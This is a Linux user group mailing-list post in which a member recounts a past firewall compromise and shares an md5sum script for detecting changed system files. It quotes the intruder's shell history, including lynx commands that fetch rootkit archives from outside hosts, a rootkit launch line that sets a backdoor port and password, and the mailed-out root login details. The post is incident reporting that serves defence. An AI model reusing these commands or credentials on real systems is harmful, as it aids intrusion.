Home
| Calendar
| Mail Lists
| List Archives
| Desktop SIG
| Hardware Hacking SIG
Wiki | Flickr | PicasaWeb | Video | Maps & Directions | Installfests | Keysignings Linux Cafe | Meeting Notes | Linux Links | Bling | About BLU |
BLU group members -- (This is sort of a long note but it may be of interest, & I don't post often...) I was hacked about a year ago. I wrote up the following shortly after the incident occurred. Given the current discussion I thought it might be worth posting. I'm still not sure how the initial breach occurred but suspect it was a poor password. I still have the hackers .bash_history and (somewhere) a disk image of the hacked system. Since then (besides closing all unused ports, turning off telnet & other insecure services, ...) I made a list of critical files in /etc, /sbin, ... and run md5sum against them regularly looking for changes. This isn;t automated, but easily could be. Just for completeness, here are the commands -- To make the initial list; === #!/bin/sh find /sbin -type f -exec md5sum {} \; > md5list1.txt find /bin -type f -exec md5sum {} \; >> md5list1.txt find /etc -type f -exec md5sum {} \; >> md5list1.txt find /usr/sbin -type f -exec md5sum {} \; >> md5list1.txt find /usr/bin -type f -exec md5sum {} \; >> md5list1.txt find /usr/local/bin -type f -exec md5sum {} \; >> md5list1.txt find /usr/lib -maxdepth 1 -type f -exec md5sum {} \; >> md5list1.txt ========= Then to test, md5sum --check md5list1.txt | grep -i failed > diff.txt I've tried tripwire but found the above much easier to do & understand. One detection over the past year -- my daughter (who as worked as a linux sysadmin) added her boyfriend as a user. That tripped the passwd and shadow files. ====================== Initial note, written up a year ago but never mailed =========== My firewall was hacked last week. I took it offline as soon as I suspected -- (Re-configured spare, locked it up, and hopefully secure now - ) I thought the group might be interested in a quick summary. Bottom line -- the firewall was compromised (burned to a crisp) but the fire seems to have stopped there. The computer was running RH 5.1, with updated kernel 2.0.34 I'm still not sure what the exploit was. (Wasn't ftpd or imapd. Maybe lpr?) I think the hacker may have been logged on when I broke the connection -- certainly he left a bunch of clues -- his .bash_history lists several "interesting" sites and packages -- rootkit, etc Quick summary of sites and packages -- (extracted from his .bash_history) lynx rollcage.net/x3.tar.gz lynx rollcage.net/diverse/essh.tgz lynx rollcage.net/diverse/dick.tgz lynx rollcage.net/diverse/ftp.tar.gz lynx rollcage.net/diverse/bec.tgz lynx www.hanks.host.sk/srk.tgz lynx www.sinrk.host.sk/srk.tgz This last is a rootkit which when invoked like so ./srk rexnet 55789 1971 sent an email thus: ====== To: decoder at email.ro (note, Mon May 26 09:22:44 EDT 2003 the ip is no longer valid ) Subject: SRK ssh 24.128.27.182 -l root -p 55789 # horne.blat.net password: rexnet psyBNC: 1971 ====== This email didn't make it out of my system, came to me as root on my main computer. I was at work but usually have a window open to home machine. Looked wierd; did a couple of quick checks, then called home, had my daughter pull the network cables. ======== (End old writeup) Steve
BLU is a member of BostonUserGroups | |
We also thank MIT for the use of their facilities. |